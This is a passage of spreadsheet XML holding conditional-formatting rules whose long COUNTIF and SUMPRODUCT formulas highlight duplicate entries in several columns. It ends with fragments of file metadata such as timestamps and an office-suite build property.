CT(IFERROR(1*(($E$605&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$606&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$607&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$608&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$609&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$610&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$611&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$612&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$613&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$614&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$615&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$616&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$617&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$618&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$619&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$620&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$621&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$622&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$623&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$624&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$625&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$626&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$627&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$628&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$629&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$630&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$631&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$632&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$633&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$634&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$635&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$636&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$637&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$638&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$639&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$640&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$641&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$642&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$643&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$644&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$645&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$646&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$647&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$648&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$649&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$650&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$651&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$652&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$653:$E$655&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$656&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$657&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$658&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$659&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$660&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$661&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$662&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$663&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$664:$E$665&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$666&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$667:$E$668&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$669&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$670&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$671:$E$672&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$673&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$674&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$675&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$676&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$677&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$678&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$679&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$680&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$681&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$682&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$683:$E$684&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$685&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$686&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$687&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$688&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$689&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$690&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$691&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$692&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$693&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$694&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$695&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$696&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$697&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$698&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$699&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$700:$E$701&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$702&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$703&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$704&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$705&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$706&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$707&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$708&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$709&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$710&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$711&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$712&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$713&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$714&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$715&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$716&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$717&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$718&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$719&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$720&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$721&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$722&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$723&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$724&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$725&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$726&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$727&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$728&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$729&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$730&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$731&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$732:$E$734&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$735:$E$736&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$737&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$738&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$739&amp;"x")=(E2&amp;"x")),0))&gt;1,NOT(ISBLANK(E2)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F2 F3 F4:F6 F7 F8 F9:F12 F13 F14:F15 F16 F17 F18:F19 F20 F21 F22 F23 F24 F25 F26:F27 F28 F29 F30 F31 F32 F33 F34 F35 F36:F37 F38 F39 F40 F41 F42:F43 F44 F45 F46 F47 F48 F49 F50 F51 F52 F53 F54 F55 F56 F57:F59 F60 F61 F62 F63:F65 F66 F67 F68 F69 F70 F71 F72 F73:F74 F75 F76 F77 F78 F79 F80 F81 F82 F83 F84 F85 F86:F89 F90:F91 F92 F93 F94 F95 F96 F97 F98 F99:F100 F101 F102 F103 F104 F105 F106 F107 F108 F109 F110:F111 F112:F113 F114 F115 F116 F117 F118:F119 F120 F121 F122 F123 F124 F125 F126 F127 F128 F129 F130 F131 F132 F133:F134 F135 F136 F137 F138 F139 F140 F141:F142 F143 F144:F145 F146 F147 F148:F149 F150 F151 F152 F153 F154 F155 F156:F157 F158:F159 F160 F161:F162 F163 F164 F165 F166 F167:F168 F169:F170 F171 F172 F173 F174 F175 F176:F177 F178 F179 F180 F181 F182 F183 F184 F185 F186 F187 F188 F189 F190 F191 F192 F193 F194 F195 F196 F197 F198 F199 F200 F201 F202:F203 F204:F205 F206 F207 F208 F209 F210 F211:F212 F213 F214 F215 F216 F217 F218 F219 F220 F221 F222 F223 F224 F225:F226 F227 F228 F229 F230 F231 F232 F233 F234 F235 F236 F237 F238 F239 F240 F241 F242 F243 F244:F245 F246 F247 F248 F249 F250 F251 F252:F253 F254 F255 F256 F257 F258 F259 F260 F261 F262:F263 F264 F265 F266 F267 F268:F269 F270 F271:F273 F274 F275 F276 F277 F278 F279 F280 F281 F282 F283 F284 F285 F286 F287 F288 F289 F290 F291 F292 F293 F294 F295 F296 F297 F298 F299 F300:F301 F302 F303 F304 F305 F306 F307 F308 F309 F310 F311 F312:F313 F314 F315 F316:F317 F318:F319 F320 F321 F322 F323 F324 F325 F326 F327 F328 F329 F330 F331 F332 F333 F334 F335 F336 F337 F338:F339 F340 F341 F342 F343 F344 F345 F346 F347 F348 F349 F350 F351 F352 F353 F354 F355 F356 F357 F358 F359 F360:F361 F362 F363 F364 F365 F366 F367 F368 F369 F370 F371:F372 F373 F374 F375 F376 F377 F378 F379 F380 F381 F382 F383 F384 F385 F386 F387 F388 F389:F390 F391 F392 F393 F394 F395 F396 F397 F398 F399 F400 F401 F402 F403 F404:F405 F406:F407 F408 F409 F410 F411 F412 F413 F414:F415 F416 F417 F418:F419 F420 F421 F422 F423 F424 F425 F426 F427 F428 F429 F430 F431 F432:F433 F434 F435:F436 F437 F438 F439 F440:F441 F442 F443 F444 F445 F446 F447 F448 F449 F450:F451 F452 F453 F454 F455 F456 F457 F458 F459 F460 F461 F462 F463:F465 F466 F467 F468 F469 F470 F471 F472 F473 F474 F475 F476 F477 F478:F479 F480 F481 F482 F483 F484 F485 F486 F487 F488 F489 F490 F491 F492:F493 F494 F495 F496 F497 F498 F499 F500 F501 F502 F503 F504:F505 F506:F507 F508:F509 F510 F511:F512 F513:F514 F515 F516 F517 F518 F519 F520 F521 F522 F523:F524 F525 F526:F527 F528 F529 F530 F531 F532 F533 F534 F535 F536 F537 F538 F539 F540 F541:F542 F543 F544 F545 F546 F547 F548 F549 F550 F551 F552 F553 F554 F555 F556 F557 F558:F559 F560 F561 F562 F563 F564 F565 F566 F567 F568 F569 F570 F571 F572 F573 F574 F575 F576 F577 F578 F579:F580 F581 F582 F583 F584 F585 F586 F587 F588:F589 F590 F591 F592 F593 F594 F595 F596 F597 F598:F599 F600 F601 F602 F603 F604 F605 F606 F607 F608 F609 F610 F611 F612 F613 F614 F615 F616 F617 F618 F619 F620 F621 F622 F623 F624 F625 F626 F627 F628 F629 F630 F631 F632 F633 F634 F635 F636 F637 F638 F639 F640 F641 F642 F643 F644 F645 F646 F647 F648 F649 F650 F651 F652 F653:F655 F656 F657 F658 F659 F660 F661 F662 F663 F664:F665 F666 F667:F668 F669 F670 F671:F672 F673 F674 F675 F676 F677 F678 F679 F680 F681 F682 F683:F684 F685 F686 F687 F688 F689 F690 F691 F692 F693 F694 F695 F696 F697 F698 F699 F700:F701 F702 F703 F704 F705 F706 F707 F708 F709 F710 F711 F712 F713 F714 F715 F716 F717 F718 F719 F720 F721 F722 F723 F724 F725 F726 F727 F728 F729 F730 F731 F732:F734 F735:F736 F737 F738 F739">
    <cfRule type="expression" dxfId="1" priority="8">
      <formula>AND(COUNTIF($F$1:$F$4444,F2)+COUNTIF($F$4446:$F$1048375,F2)&gt;1,NOT(ISBLANK(F2)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I2:I482 J486 I487:I500 I502:I739">
    <cfRule type="expression" dxfId="1" priority="7">
      <formula>AND(COUNTIF($I$1:$I$4201,I2)+COUNTIF($I$4228:$I$1048375,I2)&gt;1,NOT(ISBLANK(I2)))</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dc:creator>
  <cp:lastModifiedBy>Lisa</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-03T17:32:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-03T17:37:25Z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98374B8B60553A60310BB868519EF550_41</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.22522.22522</vt:lpwstr>
  </property>
</Properties>
</file>